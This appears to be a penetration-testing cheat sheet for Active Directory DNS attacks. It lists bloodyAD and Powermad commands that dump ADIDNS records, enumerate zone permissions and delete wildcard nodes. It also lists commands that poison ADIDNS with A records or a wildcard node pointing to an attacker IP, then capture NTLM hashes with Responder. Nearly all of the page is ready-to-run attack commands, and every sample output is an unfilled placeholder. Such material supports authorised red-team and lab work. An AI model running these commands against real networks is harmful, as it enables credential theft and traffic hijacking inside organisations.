Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Authentication Method
Enumeration
1. DNS Dump
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> get dnsDump
Sample Output:
TO-DO# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> get dnsDump
Sample Output:
TO-DO# Password-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> get dnsDump
Sample Output:
TO-DO# NTLM-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> get dnsDump
Sample Output:
TO-DO# Ticket-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> get dnsDump
Sample Output:
TO-DO1. Import Powermad
. .\Powermad.ps1
Sample Output:
TO-DO2. Enumerate
# Get ADIDNS zone
Get-ADIDNSZone
Sample Output:
TO-DO# Get ADIDNS permissions
Get-ADIDNSPermission
Sample Output:
TO-DO# Remove a wildcard node
Remove-ADIDNSNode -Node *
Sample Output:
TO-DOADIDNS Poisoning
1. Add a New A Record
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add dnsRecord <SUBDOMAIN> <LOCAL_IP>
Sample Output:
TO-DO# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> add dnsRecord <SUBDOMAIN> <LOCAL_IP>
Sample Output:
TO-DO# Password-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> add dnsRecord <SUBDOMAIN> <LOCAL_IP>
Sample Output:
TO-DO# NTLM-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> add dnsRecord <SUBDOMAIN> <LOCAL_IP>
Sample Output:
TO-DO# Ticket-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> add dnsRecord <SUBDOMAIN> <LOCAL_IP>
Sample Output:
TO-DO2. Capture NTLM
sudo responder -I tun0
Sample Output:
TO-DO1. Import Powermad
. .\Powermad.ps1
Sample Output:
TO-DO2. Create a New Node
$dnsRecord = New-DNSRecordArray -Type A -Data <LOCAL_IP>
Sample Output:
TO-DO# Create a wildcard node
New-ADIDNSNode -Node * -Tombstone -DNSRecord $dnsRecord -Verbose
Sample Output:
TO-DO3. Check
Resolve-DnsName DoesNotExist
Sample Output:
TO-DO4. Capture NTLM
sudo responder -I tun0
Sample Output:
TO-DO